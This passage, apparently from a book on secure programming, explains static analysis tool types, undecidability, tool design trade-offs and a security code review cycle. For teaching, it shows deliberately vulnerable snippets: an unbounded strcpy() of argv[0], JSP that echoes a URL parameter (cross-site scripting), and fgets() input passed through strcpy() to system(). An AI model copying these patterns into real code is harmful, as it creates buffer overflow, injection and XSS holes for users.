returning NULL, malloc() is indicating that no memory has been allocated. This could indicate a problem with the way the property is specified, or it could be a problem with the way the property checker works. Example 2.8 An errant counterexample from a property checking tool running against the code in Example 2.6. The tool does not understand that when malloc() returns NULL, no memory has been allocated, and therefore no memory needs to be freed. Violation of property "allocated memory should always be freed": line 2: inBuf == NULL line 3: function returns (-1) without freeing inBuf Praxis High Integrity Systems ( offers a commercial program verification tool for a subset of the Ada programming 2.2 Solving Problems with Static Analysis 31 language [Barnes, 2003]. Escher Technologies ( has its own programming language that can be compiled into C++ or Java. Numerous university research projects exist in both the program verification and property checking realm; we discuss many of them in Chapter 4. Polyspace ( and Grammatech ( both sell property checking tools. Formal Verification and the Orange Book Formal verification, wherein a tool applies a rigorous mathematical approach to its verification task, has a long and storied history. One of the best-known calls for the application of formal methods for the purposes of verifying security properties of system designs was included as part of the Trusted Computer System Evaluation Criteria (TCSEC), more often known by its colloquial name “the Orange Book” [DOD, 1985]. The Orange Book was written to guide developers in the creation of secure systems for sale to the U.S. government and military. The TCSEC is no longer in use, but many of the concepts it contained formed the basis for the Common Criteria (ISO/IEC standard 15408), a system for specifying and measuring security requirements. The Common Criteria are primarily used by government and military agencies in the United States and Europe. The Orange Book outlines a hierarchy of security features and assurances along with a qualification process for certifying a product at a particular ranking. The TCSEC covers a wide variety of subjects, including mechanisms that should be used to protect information in the system (access controls), identification and authentication of users, audit features, system specification, architecture, test and verification methods, covert channel analysis, documentation requirements, trusted product-delivery systems, and many others. The TCSEC does not mandate the use of formal methods for any level of certification except the highest one: A1. A1 certification requires a formal demonstration that the system design meets the requirements of the security policy. Formally demonstrating that the design has been implemented without error was not required. A1 certification entailed rigorously defining a system’s security policy and formally demonstrating that the system design enforces the policy. By the few who attempted it, this was always achieved by hierarchically decomposing the design, showing that the highest level of abstraction meets the requirements of the security policy and that each lower level of abstraction meets the requirements specified by the next higher level. 32 Chapter 2 Introduction to Static Analysis Bug Finding The purpose of a bug finding tool is not to complain about formatting issues, like a style checker, nor is it to perform a complete and exhaustive comparison of the program against a specification, as a program verification tool would. Instead, a bug finder simply points out places where the program will behave in a way that the programmer did not intend. Most bug finders are easy to use because they come prestocked with a set of “bug idioms” (rules) that describe patterns in code that often indicate bugs. Example 2.9 demonstrates one such idiom, known as double-checked locking. The purpose of the code is to allocate at most one object while minimizing the number of times any thread needs to enter the synchronized block. Although it might look good, before Java 1.5, it does not work— earlier Java versions did not guarantee that only one object would be allocated [Bacon, 2007]. Example 2.10 shows how the open source tool FindBugs ( identifies the problem [Hovemeyer and Pugh, 2004]. Example 2.9 Double-checked locking. The purpose is to minimize synchronization while guaranteeing that only one object will ever be allocated, but the idiom does not work. 1 if (this.fitz == null) { 2 synchronized (this) { 3 if (this.fitz == null) { 4 this.fitz = new Fitzer(); 5 } 6} 7} Example 2.10 FindBugs identifies the double-checked locking idiom. M M DC: Possible doublecheck on Fizz.fitz in Fizz.getFitz() At[lines 1-3] Sophisticated bug finders can extend their built-in patterns by inferring requirements from the code itself. For example, if a Java program uses the same synchronization lock to restrict access to a particular member variable in 99 out of 100 places where the member variable is used, it is likely that the lock should also protect the 100th usage of the member variable. 2.2 Solving Problems with Static Analysis 33 Some bug finding tools use the same sorts of algorithms used by property checking tools, but bug finding tools generally focus on producing a low number of false positives even if that means a higher number of false negatives. An ideal bug finding tool is sound with respect to a counterexample. In other words, when it generates a bug report, the accompanying counterexample always represents a feasible sequence of events in the program. (Tools that are sound with respect to a counterexample are sometimes called complete in academic circles.) We think FindBugs does an excellent job of identifying bugs in Java code. Coverity makes a bug finder for C and C++ ( Microsoft’s Visual Studio 2005 includes the \analyze option (sometimes called Prefast) that checks for common coding errors in C and C++. Klocwork ( offers a combination program understanding and bug finding static analysis tool that enables graphical exploration of large programs. Security Review Security-focused static analysis tools use many of the same techniques found in other tools, but their more focused goal (identifying security problems) means that they apply these techniques differently. The earliest security tools, ITS4 [Viega et al., 2000], RATS [RATS, 2001], and Flawfinder [Wheeler, 2001], were little more than a glorified grep; for the most part, they scanned code looking for calls to functions such as strcpy() that are easy to misuse and should be inspected as part of a manual source code review. In this sense, they were perhaps most closely related to style checkers—the things they pointed out would not necessarily cause security problems, but they were indicative of a heightened reason for security concern. Time after time, these tools have been indicted for having a high rate of false positives because people tried to interpret the tool output as a list of bugs rather than as an aid for use during code review. Modern security tools are more often a hybrid of property checkers and bug finders. Many security properties can be succinctly expressed as program properties. For a property checker, searching for potential buffer overflow vulnerabilities could be a matter of checking the property “the program does not access an address outside the bounds of allocated memory”. From the bug finding domain, security tools adopt the notion that developers often continue to reinvent the same insecure method of solving a problem, which can be described as an insecure programming idiom. 34 Chapter 2 Introduction to Static Analysis As we noted earlier, even though bug finding techniques sometimes prove useful, security tools generally cannot inherit the bug finding tools’ tendency to minimize false positives at the expense of allowing false negatives. Security tools tend to err on the side of caution and point out bits of code that should be subject to manual review even if the tool cannot prove that they represent exploitable vulnerabilities. This means that the output from a security tool still requires human review and is best applied as part of a code review process. (We discuss the process for applying security tools in Chapter 3, “Static Analysis as Part of Code Review.”) Even so, the better a security tool is, the better job it will do at minimizing “dumb” false positives without allowing false negatives to creep in. Example 2.11 illustrates this point with two calls to strcpy(). Using strcpy() is simply not a good idea, but the first call cannot result in a buffer overflow; the second call will result in an overflow if argv[0] points to a very long string. (The value of argv[0] is usually, but not always, the name of the program.2) A good security tool places much more emphasis on the second call because it represents more than just a bad practice; it is potentially exploitable. Example 2.11 A C program with two calls to strcpy(). A good security tool will categorize the first call as safe (though perhaps undesirable) and the second call as dangerous. int main(int argc, char* argv[]) { char buf1[1024]; char buf2[1024]; char* shortString = "a short string"; strcpy(buf1, shortString); /* safe use of strcpy */ strcpy(buf2, argv[0]); /* dangerous use of strcpy */ ... Fortify Software ( and Ounce Labs ( make static analysis tools that specifically 2. Under filesystems that support symbolic links, an attacker can make a symbolic link to a program, and then argv[0] will be the name of the symbolic link. In POSIX environments, an attacker can write a wrapper program that invokes a function such as execl() that allows the attacker to specify a value for argv[0] that is completely unrelated to the name of the program being invoked. Both of these scenarios are potential means of attacking a privileged program. See Chapter 12 for more about attacks such as these. 2.3 A Little Theory, a Little Reality 35 target security. Both of us are particularly fond of Fortify because we’ve put a lot of time and effort into building Fortify’s static analysis tool set. (Brian is one of Fortify’s founders, and Jacob manages Fortify’s Security Research Group.) A third company, Secure Software, sold a static analysis tool aimed at security, but in early 2007, Fortify acquired Secure’s intellectual property. Go Fortify! 2.3 A Little Theory, a Little Reality Static analysis is a computationally undecidable problem. Naysayers sometimes try to use this fact to argue that static analysis tools are not useful, but such arguments are specious. To understand why, we briefly discuss undecidability. After that, we move on to look at the more practical issues that make or break a static analysis tool. In the mid-1930s, Alan Turing, as part of his conception of a generalpurpose computing machine, showed that algorithms cannot be used to solve all problems. In particular, Turing posed the halting problem, the problem of determining whether a given algorithm terminates (reaches a final state). The proof that the halting problem is undecidable boils down to the fact that the only way to know for sure what an algorithm will do is to carry it out. In other words, the only guaranteed way to know what a program will do is to run it. If indeed an algorithm does not terminate, a decision about whether the algorithm terminates will never be reached. This notion of using one algorithm to analyze another (the essence of static analysis) is part of the foundation of computer science. For further reading on computational theory, we recommend Sipser’s Introduction to the Theory of Computation, Second Edition [Sipser, 2005]. In 1953, Henry Rice posed what has come to be known as Rice’s theorem. The implication of Rice’s theorem is that static analysis cannot perfectly determine any nontrivial property of a general program. Consider the following two lines of pseudocode: if program p halts call unsafe() It is easy to see that, to determine whether this code ever calls the function unsafe(), a static analysis tool must solve the halting problem. Example 2.12 gives a deeper demonstration of the fundamental difficulties that force all static analysis tools to produce at least some false posi- 36 Chapter 2 Introduction to Static Analysis tives or false negatives. Imagine the existence of a function is_safe() that always returns true or false. It takes a program as an argument, and returns true if the program is safe and false if the program is not safe. This is exactly the behavior we’d like from a static analysis tool. We can informally show that is_safe() cannot possibly fulfill its promise. Example 2.12 shows the function bother() that takes a function as its argument and calls unsafe() only if its argument is safe. The example goes on to call the function bother() on itself recursively. Assume that is_safe() itself is safe. What should the outcome be? If is_safe() declares that bother() is safe, bother will call unsafe(). Oops. If is_safe() declares that bother() is unsafe, bother() will not call unsafe(), and, therefore, it is safe. Both cases lead to a contradiction, so is_safe() cannot possibly behave as advertised. Example 2.12 Perfectly determining any nontrivial program property is impossible in the general case. is_safe() cannot behave as specified when the function bother() is called on itself. bother(function f) { if ( is_safe(f) ) call unsafe(); } b = bother; bother(b); Success Criteria In practice, the important thing is that static analysis tools provide useful results. The fact that they are imperfect does not prevent them from having significant value. In fact, the undecidable nature of static analysis is not really the major limiting factor for static analysis tools. To draw an analogy from the physical world, the speed of light places a potential limitation on the maximum speed of a new car, but many engineering difficulties limit the speed of cars well before the speed of light becomes an issue. The major practical factors that determine the utility of a static analysis tool are: • The ability of the tool to make sense of the program being analyzed • The trade-offs the tool makes between precision and scalability 2.3 A Little Theory, a Little Reality 37 • The set of errors that the tool checks for • The lengths to which the tool’s creators go to in order to make the tool easy to use Making Sense of the Program Ascribing meaning to a piece of source code is a challenging proposition. It requires making sense of the program text, understanding the libraries that the program relies on, and knowing how the various components of the program fit together. Different compilers (or even different versions of the same compiler) interpret source code in different ways, especially where the language specification is ambiguous or allows the compiler leeway in its interpretation of the code. A static analysis tool has to know the rules the compiler plays by to parse the code the same way the compiler does. Each corner case in the language represents another little problem for a static analysis tool. Individually, these little problems are not too hard to solve, but taken together, they make language parsing a tough job. To make matters worse, some large organizations create their own language dialects by introducing new syntax into a language. This compounds the parsing problem. After the code is parsed, a static analysis tool must understand the effects of library or system calls invoked by the program being analyzed. This requires the tool to include a model for the behavior of library and system functions. Characterizing all the relevant libraries for any widely used programming language involves understanding thousands of functions and methods. The quality of the tool’s program model—and therefore the quality of its analysis results—is directly related to the quality of its library characterizations. Although most static analysis research has focused on analyzing a single program at a time, real software systems almost always consist of multiple cooperating programs or modules, which are frequently written in different programming languages. If a static analysis tool can analyze multiple languages simultaneously and make sense of the relationships between the different modules, it can create a system model that more accurately represents how, when, and under what conditions the different pieces of code will run. Finally, modern software systems are increasingly driven by a critical aspect of their environment: configuration files. The better a tool can make sense of a program’s configuration information, the better the model 38 Chapter 2 Introduction to Static Analysis it can create. Popular buzzwords, including system-oriented architecture, aspect-oriented programming, and dependency injection, all require understanding configuration information to accurately model the behavior of the program. Configuration information is useful for another purpose, too. For Web-based applications, the program’s configuration often specifies the binding between the code and the URIs used to access the code. If a static analysis tool understands this binding, its output can include information about which URIs and which input parameters are associated with each vulnerability. In some cases, a dynamic testing tool can use this information to create an HTTP request to the Web application that will demonstrate the vulnerability. Working in the other direction, when a dynamic testing tool finds a vulnerability, it can use static analysis results to provide a root-cause analysis of the vulnerability. Not all static analysis results are easy to generate tests for, however. Some depend on very precise timing, and others require manipulation of input sources other than the HTTP request. Just because it is hard to generate a dynamic test for a static analysis result does not mean the result is invalid. Conversely, if it is easy to generate a dynamic test for a static analysis result, it is reasonable to assume that it would be easy for an attacker to generate the same test. Trade-Offs Between Precision, Depth, and Scalability The most precise methods of static analysis, in which all possible values and all eventualities are tracked with unyielding accuracy, are currently capable of analyzing thousands or tens of thousands of lines of code before the amount of memory used and the execution time required become unworkable. Modern software systems often involve millions or tens of millions of lines of code, so maximum precision is not a realistic possibility in many circumstances. On the other end of the spectrum, a simple static analysis algorithm, such as one that identifies the use of dangerous or deprecated functions, is capable of processing an effectively unlimited amount of code, but the results provide only limited value. Most static analysis tools sacrifice some amount of precision to achieve better scalability. Cutting-edge research projects often focus on finding better trade-offs. They look for ways to gain scalability by sacrificing precision in such a way that it will not be missed. The depth of analysis a tool performs is often directly proportional to the scope of the analysis (the amount of the program that the tool examines 2.3 A Little Theory, a Little Reality 39 at one time). Looking at each line one at a time makes for fast processing, but the lack of context necessarily means that the analysis will be superficial. At the other extreme, analyzing an entire program or an entire system provides much better context for the analysis but is expensive in terms of time, memory, or both. In between are tools that look at individual functions or modules one at a time. From a user’s perspective, static analysis tools come in several speed grades. The fastest tools provide almost instantaneous feedback. These tools could be built into an IDE the same way an interactive spell checker is built into Microsoft Word, or they could run every time the compiler runs. With the next rung up, users might be willing to take a coffee break or get lunch while the tool runs. A programmer might use such a tool once a day or just before committing code to the source repository. At the top end, tools give up any pretense at being interactive and run overnight or over a weekend. Such tools are best suited to run as part of a nightly build or a milestone build. Naturally, the greater the depth of the analysis, the greater the runtime of the tool. To give a rough sense of the trade-offs that tools make, Figure 2.2 considers the bug finding and security tools discussed earlier in the chapter and plots their execution time versus the scope of the analysis they perform. Execution Time Overnight Coffee break FindBugs Klocwork Fortify Ounce Coverity Blink of an eye ITS4 Flawfinder RATS MS\ analyze Line Function Module Program Analysis Scope Figure 2.2 Analysis scope vs. execution time for the bug finding and security tools discussed in Section 2.1. 40 Chapter 2 Introduction to Static Analysis Finding the Right Stuff Static analysis tools must be armed with the right set of defects to search for. What the “right set” consists of depends entirely upon the purpose of the software being analyzed. Clients fail differently than servers. Operating systems fail differently than desktop applications. The makers of a static analysis tool must somehow take this context into account. With research tools, the most common approach is to build a tool that targets only a small number of scenarios. Commercial tools sometimes ask the user to select the scenario at hand to make decisions about what to report. Even with a limited purview, the most valuable things to search for are often specific to the particular piece of software being evaluated. Finding these defects requires the tool to be extensible; users must be able to add their own custom rules. For example, detecting locations where private data are made public or otherwise mismanaged by a program requires adding custom rules that tell the analysis tool which pieces of data are considered private. Just as a good program model requires a thorough characterization of the behavior of libraries and system interfaces, detecting defects requires a thorough set of rules that define where and under what circumstances the defects can occur. The size of the rule set is the first and most obvious means of comparing the capabilities of static analysis tools [McGraw, 2006], but counting the number of rules that a tool has does not tell the whole story, especially if a single rule can be applied in a variety of circumstances or can contain wildcards that match against entire families of functions. Comparing static analysis tools based on the size of their rule sets is like comparing operating systems based on the number of lines of source code they are built from. The best way to compare static analysis tools is by using them to analyze the same code and comparing the results, but choosing the right code for comparing tools is no small problem in and of itself. A number of attempts at creating static analysis benchmarks have arisen in the last few years: • Benjamin Livshits has put together two benchmarks for static analysis tools. SecuriBench ( is a collection of open source Web-based Java programs that contain known security defects. SecuriBench Micro ( work/securibench-micro/) is a set of small hand-crafted Java programs that are intentionally written to stress different aspects of a static analysis tool. • Zitser, Lippman, and Leek have assembled a small collection of vulnerable programs derived from real-world vulnerable programs for the 2.3 A Little Theory, a Little Reality 41 purpose of testing static analysis tools [Zitser, 2004]. Kratkiewicz later created a set of scripts to generate vulnerable programs with different characteristics [Kratkiewicz, 2005]. • The SAMATE group at NIST ( is in the process of creating a publicly available reference data set for the purpose of benchmarking static analysis tools. • Tim Newsham and Brian Chess have developed the Analyzer Benchmark (ABM), which consists of a mix of small hand-crafted programs and large real-world programs meant for characterizing static analysis tools [Newsham and Chess, 2005]. All of the ABM test cases have been donated to the NIST SAMATE project. • The Department of Homeland Security’s Build Security In site ( hosts a set of sample programs developed by Cigital that are meant to help evaluate static analysis tools. Beyond selecting test cases, benchmarking static analysis tools is difficult because there is no widely agreed-upon yardstick for comparing results. It’s hard to reach a general consensus about whether one possible trade-off between false positives and false negatives is better than another. If you need to perform a tool evaluation, our best advice is to run all the tools against a real body of code that you understand well. If possible, use a program that contains known vulnerabilities. Compare results in light of your particular needs. Ease of Use A static analysis tool is always the bearer of bad news. It must convince a programmer that the code does something unexpected or incorrect. If the way the tool presents its findings is not clear and convincing, the programmer is not likely to take heed. Static analysis tools have greater usability problems than that, though. If a tool does not present good error information when it is invoked incorrectly or when it cannot make sense of the code, users will not understand the limitations of the results they receive. In general, finding the source code that needs to be analyzed is a hard job because not all source files are relevant under all circumstances, and languages such as C and C++ allow code to be included or not included using preprocessor directives. The best way for a tool to identify the code that actually needs to be analyzed is for it to integrate smoothly with the program’s build system. Popular build tools include Make, Ant, Maven, and a whole manner of integrated development environments such as Microsoft’s Visual Studio and the open source 42 Chapter 2 Introduction to Static Analysis program Eclipse. Integrating within a programmer’s development environment also provides a forum for presenting results. In an industrial setting, a source code analysis tool must fit in as part of the software development process. (This is the topic of Chapter 3.) Because the same codebase can grow and evolve over a period of months, years or decades, the tool should make it easy to review results through multiple revisions of the code. It should allow users to suppress false positives so that they don’t have to review them again in the future or to look at only issues that have been introduced since the last review. All static analysis tools make trade-offs between false positives and false negatives. Better tools allow the user to control the trade-offs they make, to meet the specific needs of the user. Analyzing the Source vs. Analyzing Compiled Code Most static analysis tools examine a program as the compiler sees it (by looking at the source code), but some examine the program as the runtime environment sees it (by looking at the bytecode or the executable). Looking at compiled code offers two advantages: • The tool does not need to guess at how the compiler will interpret the code because the compiler has already done its work. Removing the compiler removes ambiguity. • Source code can be hard to come by. In some circumstances, it is easier to analyze the bytecode or the executable simply because it is more readily available. A few distinct disadvantages exist, too: • Making sense out of compiled code can be tough. A native executable can be difficult to decode. This is particularly true for formats that allow variable-width instructions, such as Intel x86, because the meaning of program changes depending upon where decoding begins. Some static analysis tools use information gleaned from dynamic analysis tools such as IDA Pro to counter this problem. Even a properly decoded binary lacks the type information that is present in source code. The lack of type information makes analysis harder. Optimizations performed by the compiler complicate matters further. Languages such as Java that are compiled into bytecode do not have the same decoding problem, and type information is present in the bytecode, too. But even without these problems, the transformations performed by the compiler can throw away or obscure information about 2.3 A Little Theory, a Little Reality 43 the programmer’s intent. The compilation process for JavaServer Pages (JSPs) illustrates this point. The JavaServer Pages format allows a programmer to combine an HTML-like markup language with Java code. At runtime, the JSP interpreter compiles the JSP source file into Java source code and then uses the standard Java compiler to translate the Java source code into bytecode. The three lines of JSP markup shown in Example 2.13 are relatively straightforward: They echo the value of a URL parameter. (This is a cross-site scripting vulnerability. For more information about cross-site scripting, see Chapter 9, “Web Applications.”) The JSP compiler translates these three lines of markup into more than 50 lines of Java source code, as shown in Example 2.14. The Java source code contains multiple conditionals, a loop, and several return statements, even though none of these constructs is evident in the original JSP markup. Although it is possible to understand the behavior of the JSP by analyzing the Java source, it is significantly more difficult. Taken together, these examples demonstrate the kinds of challenges that looking at compiled code can introduce. This problem is even worse for C and C++ programs. For many kinds of program properties, analyzing the implementation of a function does not reveal the semantics of the function. Consider a function that allows the program to send a string as a SQL query to a remote database. The executable code might reveal some transformations of a string, then some packets sent out over the network, and then some packets received back from the network. These operations would not explain that the string will be interpreted as a SQL query. • Analyzing a binary makes it harder to do a good job of reporting useful findings. Most programmers would like to see findings written in terms of source code, and that requires a binary analysis tool to map its analysis from the executable back to the source. If the binary includes debugging information, this mapping might not be too difficult, but if the binary does not have debugging information or if the compiler has optimized the code to the point that it does not easily map back to the source, it will be hard to make sense of the analysis results. For bytecode formats such as Java, there is no clear right answer. The source code contains more information, but the bytecode is easier to come by. For native programs, the disadvantages easily outweigh the advantages; analyzing the source is easier and more effective. 44 Chapter 2 Introduction to Static Analysis Example 2.13 A small example of Java Server Page (JSP) markup. The code echoes the value of a URL parameter (a cross-site scripting vulnerability). Example 2.14 Three lines of JSP markup are transformed into more than 50 lines of Java code. The Java code is much harder to understand than the JSP markup. Translating JSP into Java before analyzing it makes the analysis job much harder. if (_fmt_message0 == null) _fmt_message0 = new org.apache.taglibs.standard.tag.el.fmt. MessageTag_fmt_message0.setPageContext(pageContext); _fmt_message0.setParent((javax.servlet.jsp.tagext.Tag)null); _activeTag = _fmt_message0; _fmt_message0.setKey( weblogic.utils.StringUtils.valueOf("hello")); _int0 = _fmt_message0.doStartTag(); if (_int0 != Tag.SKIP_BODY) { if (_int0 == BodyTag.EVAL_BODY_BUFFERED) { out = pageContext.pushBody(); _fmt_message0.setBodyContent((BodyContent)out); _fmt_message0.doInitBody(); } do { out.print("\r\n "); if (_fmt_param0 == null) _fmt_param0 = new org.apache.taglibs.standard.tag.el.fmt.ParamTag(); _fmt_param0.setPageContext(pageContext); _fmt_param0.setParent( (javax.servlet.jsp.tagext.Tag)_fmt_message0); _activeTag = _fmt_param0; _fmt_param0.setValue( weblogic.utils.StringUtils.valueOf("${param.test}")); _int1 = _fmt_param0.doStartTag(); weblogic.servlet.jsp.StandardTagLib.fakeEmptyBodyTag( pageContext, _fmt_param0, _int1, true); if (_fmt_param0.doEndTag() == Tag.SKIP_PAGE) { _activeTag = null; _releaseTags(_fmt_param0); return; } _activeTag = _fmt_param0.getParent(); _fmt_param0.release(); out.print("\r\n "); Summary 45 } while ( _fmt_message0.doAfterBody() == IterationTag.EVAL_BODY_AGAIN); if (_int0 == BodyTag.EVAL_BODY_BUFFERED) out = pageContext.popBody(); } if (_fmt_message0.doEndTag() == Tag.SKIP_PAGE) { _activeTag = null; _releaseTags(_fmt_message0); return; } _activeTag = _fmt_message0.getParent(); _fmt_message0.release(); _writeText(response, out, _wl_block2, _wl_block2Bytes); if (_fmt_message0 == null) _fmt_message0 = new org.apache.taglibs.standard.tag.el.fmt.MessageTag(); Summary Static analysis is useful for many purposes, but it is especially useful for security because it provides a means of thorough analysis that is not otherwise feasible. Table 2.1 lists the static analysis tools discussed in the chapter. All static analysis tools produce at least some false positives or some false negatives, but most produce both. For security purposes, false negatives are more troublesome than false positives, although too many false positives can lead a reviewer to overlook true positives. Practical challenges for static analysis tools include the following: • Making sense of the program (building an accurate program model) • Making good trade-offs between precision, depth, and scalability • Looking for the right set of defects • Presenting easy-to-understand results and errors • Integrating easily with the build system and integrated development environments Static analysis tools can analyze source or compiled code. For bytecode languages such as Java, the two approaches are on roughly equal footing. For C and C++ programs, analyzing compiled code is harder and produces inferior results. 46 Chapter 2 Introduction to Static Analysis Table 2.1 Static analysis tools discussed in the chapter. Type of Tool/Vendors Style Checking PMD Parasoft Program Understanding Fujaba CAST Program Verification Praxis High Integrity Systems Escher Technologies Property Checking Polyspace Grammatech Bug Finding FindBugs Coverity Visual Studio 2005 \analyze Klocwork Security Review Fortify Software Ounce Labs Web Site 3 Static Analysis as Part of the Code Review Process In preparing for battle, plans are useless but planning is indispensable. —Dwight Eisenhower There’s a lot to know about how static analysis tools work. There’s probably just as much to know about making static analysis tools work as part of a secure development process. In this respect, tools that assist with security review are fundamentally different than most other kinds of software development tools. A debugger, for example, doesn’t require any organization-wide planning to be effective. An individual programmer can run it when it’s needed, obtain results, and move on to another programming task. But the need for software security rarely creates the kind of urgency that leads a programmer to run a debugger. For this reason, an organization needs a plan for who will conduct security reviews, when the reviews will take place, and how to act on the results. Static analysis tools should be part of the plan because they can make the review process significantly more efficient. Code review is a skill. In the first part of this chapter, we look at what that skill entails and outline the steps involved in performing a code review. We pay special attention to the most common snag that review teams get hung up on: debates about exploitability. In the second part of the chapter, we look at who needs to develop the code review skill and when they need to apply it. Finally, we look at metrics that can be derived from static analysis results. 47 48 Chapter 3 Static Analysis as Part of the Code Review Process 3.1 Performing a Code Review A security-focused code review happens for a number of different reasons: • Some reviewers start out with the need to find a few exploitable vulnerabilities to prove that additional security investment is justified. • For every large project that didn’t begin with security in mind, the team eventually has to make an initial pass through the code to do a security retrofit. • At least once in every release period, every project should receive a security review to account for new features and ongoing maintenance work. Of the three, the second requires by far the largest amount of time and energy. Retrofitting a program that wasn’t written to be secure can be a considerable amount of work. Subsequent reviews of the same piece of code will be easier. The initial review likely will turn up many problems that need to be addressed. Subsequent reviews should find fewer problems because programmers will be building on a stronger foundation. Steve Lipner estimates that at Microsoft security activities consume roughly 20% of the release schedule the first time a product goes through Microsoft’s Security Development Lifecycle. In subsequent iterations, security requires less than 10% of the schedule [Lipner, 2006]. Our experience with the code review phase of the security process is similar—after the backlog of security problems is cleared out, keeping pace with new development requires much less effort. The Review Cycle We begin with an overview of the code review cycle and then talk about each phase in detail. The four major phases in the cycle are: 1. Establish goals 2. Run the static analysis tool 3. Review code (using output from the tool) 4. Make fixes Figure 3.1 shows a few potential back edges that make the cycle a little more complicated than a basic box step. The frequency with which the cycle is repeated depends largely upon the goals established in the first phase, but our experience is that if a first iteration identifies more than a handful of security problems, a second iteration likely will identify problems too. 3.1 Performing a Code Review 49 1. Establish Goals 4. Make Fixes 2. Run Tools 3. Review Code Figure 3.1 The code review cycle. Later in the chapter, we discuss when to perform code review and who should do the reviewing, but we put forth a typical scenario here to set the stage. Imagine the first iteration of the cycle being carried out midway through the time period allocated for coding. Assume that the reviewers are programmers who have received security training. 1. Establish Goals A well-defined set of security goals will help prioritize the code that should be reviewed and criteria that should be used to review it. Your goals should come from an assessment of the software risks you face. We sometimes hear sweeping high-level objectives along these lines: • “If it can be reached from the Internet, it has to be reviewed before it’s released.” or • “If it handles money, it has to be reviewed at least once a year.” We also talk to people who have more specific tactical objectives in mind. A short-term focus might come from a declaration: • “We can’t fail our next compliance audit. Make sure the auditor gives us a clean bill of health.” or • “We’ve been embarrassed by a series of cross-site scripting vulnerabilities. Make it stop.” 50 Chapter 3 Static Analysis as Part of the Code Review Process You need to have enough high-level guidance to prioritize your potential code review targets. Set review priorities down to the level of individual programs. When you’ve gotten down to that granularity, don’t subdivide any further; run static analysis on at least a whole program at a time. You might choose to review results in more detail or with greater frequency for parts of the program if you believe they pose more risk, but allow the tool’s results to guide your attention, at least to some extent. At Fortify, we conduct lineby-line peer review for components that we deem to be high risk, but we always run tools against all of the code. When we ask people what they’re looking for when they do code review, the most common thing we hear is, “Uh, err, the OWASP Top Ten?” Bad answer. The biggest problem is the “?” at the end. If you’re not too sure about what you’re looking for, chances are good that you’re not going to find it. The “OWASP Top Ten” part isn’t so hot, either. Checking for the OWASP Top Ten is part of complying with the Payment Card Industry (PCI) Data Security Standard, but that doesn’t make it the beginning and end of the kinds of problems you should be looking for. If you need inspiration, examine the results of previous code reviews for either the program you’re planning to review or similar programs. Previously discovered errors have an uncanny way of slipping back in. Reviewing past results also gives you the opportunity to learn about what has changed since the previous review. Make sure reviewers understand the purpose and function of the code being reviewed. A high-level description of the design helps a lot. It’s also the right time to review the risk analysis results relevant to the code. If reviewers don’t understand the risks before they begin, the relevant risks will inevitably be determined in an ad-hoc fashion as the review proceeds. The results will be less than ideal because the collective opinion about what is acceptable and what is unacceptable will evolve as the review progresses. The “I’ll know a security problem when I see it” approach doesn’t yield optimal results. 2. Run Static Analysis Tools Run static analysis tools with the goals of the review in mind. To get started, you need to gather the target code, configure the tool to report the kinds of problems that pose the greatest risks, and disable checks that aren’t relevant. The output from this phase will be a set of raw results for use during code review. Figure 3.2 illustrates the flow through phases 2 and 3. 3.1 Performing a Code Review Source if ( fgets ( buf , sizeof(buf) Code stdin) == buf ) { strcpy ( othr , buf ); system ( othr ); Rules 51 Perform Analysis Raw Results Human Review Findings Static Analysis 2. Run Tools 3. Review Code Figure 3.2 Steps 2 and 3: running the tool and reviewing the code. To get good results, you should be able to compile the code being analyzed. For development groups operating in their own build environment, this is not much of an issue, but for security teams who’ve had the code thrown over the wall to them, it can be a really big deal. Where are all the header files? Which version of that library are you using? The list of snags and roadblocks can be lengthy. You might be tempted to take some shortcuts here. A static analysis tool can often produce at least some results even if the code doesn’t compile. Don’t cave. Get the code into a compilable state before you analyze it. If you get into the habit of ignoring parse errors and resolution warnings from the static analysis tool, you’ll eventually miss out on important results. This is also the right time to add custom rules to detect errors that are specific to the program being analyzed. If your organization has a set of secure coding guidelines, go through them and look for things you can encode as custom rules. A static analysis tool won’t, by default, know what constitutes a security violation in the context of your code. Chances are good that you can dramatically improve the quality of the tool’s results by customizing it for your environment. Errors found during previous manual code reviews are particularly useful here, too. If a previously identified error can be phrased as a violation of some program invariant (never do X, or always do Y), write a rule to detect 52 Chapter 3 Static Analysis as Part of the Code Review Process similar situations. Over time, this set of rules will serve as a form of institutional memory that prevents previous security slip-ups from being repeated. 3. Review Code Now it’s time to review the code with your own eyes. Go through the static analysis results, but don’t limit yourself to just analysis results. Allow the tool to point out potential problems, but don’t allow it to blind you to other problems that you can find through your own inspection of the code. We routinely find other bugs right next door to a tool-reported issue. This “neighborhood effect” results from the fact that static analysis tools often report a problem when they become confused in the vicinity of a sensitive operation. Code that is confusing to tools is often confusing to programmers, too, although not always for the same reasons. Go through all the static analysis results; don’t stop with just the high-priority warnings. If the list is long, partition it so that multiple reviewers can share the work. Reviewing a single issue is a matter of verifying the assumptions that the tool made when it reported the issue. Do mitigating factors prevent the code from being vulnerable? Is the source of untrusted data actually untrusted? Is the scenario hypothesized by the tool actually feasible?1 If you are reviewing someone else’s code, it might be impossible for you to answer all these questions, and you should collaborate with the author or owner of the code. Some static analysis tools makes it easy to share results (for instance, by publishing an issue on an internal Web site), which simplifies this process. Collaborative auditing is a form of peer review. Structured peer reviews are a proven technique for identifying all sorts of defects [Wiegers, 2002; Fagan, 1976]. For security-focused peer review, it’s best to have a security specialist as part of the review team. Peer review and static analysis are complimentary techniques. When we perform peer reviews, we usually put one reviewer in charge of going through tool output. If, during the review process, you identify a problem that wasn’t found using static analysis, return to step 2: Write custom rules to detect other instances of the same problem and rerun the tools. Human eyes are great for spotting new varieties of defects, and static analysis excels at making sure that every instance of those new problems has been found. The back edge from step 3 to step 2 in Figure 3.1 represents this work. 1. Michael Howard outlines a structured process for answering questions such as these in a security and privacy article entitled “A Process for Performing Security Code Reviews” [Howard, 2006]. 3.1 Performing a Code Review 53 Code review results can take a number of forms: bugs entered into the bug database, a formal report suitable for consumption by both programmers and management, entries into a software security tracking system, or an informal task list for programmers. No matter what the form is, make sure the results have a permanent home so that they’ll be useful during the next code review. Feedback about each issue should include a detailed explanation of the problem, an estimate of the risk it brings, and references to relevant portions of the security policy and risk assessment documents. This permanent collection of review results is good for another purpose, too: input for security training. You can use review results to focus training on real problems and topics that are most relevant to your code. 4. Make Fixes Two factors control the way programmers respond to the feedback from a security review: • Does security matter to them? If getting security right is a prerequisite for releasing their code, it matters. Anything less is shaky ground because it competes with adding new functionality, fixing bugs, and making the release date. • Do they understand the feedback? Understanding security issues requires security training. It also requires the feedback to be written in an intelligible manner. Results stemming from code review are not concrete the way a failing test case is, so they require a more complete explanation of the risk involved. If security review happens early enough in the development lifecycle, there will be time to respond to 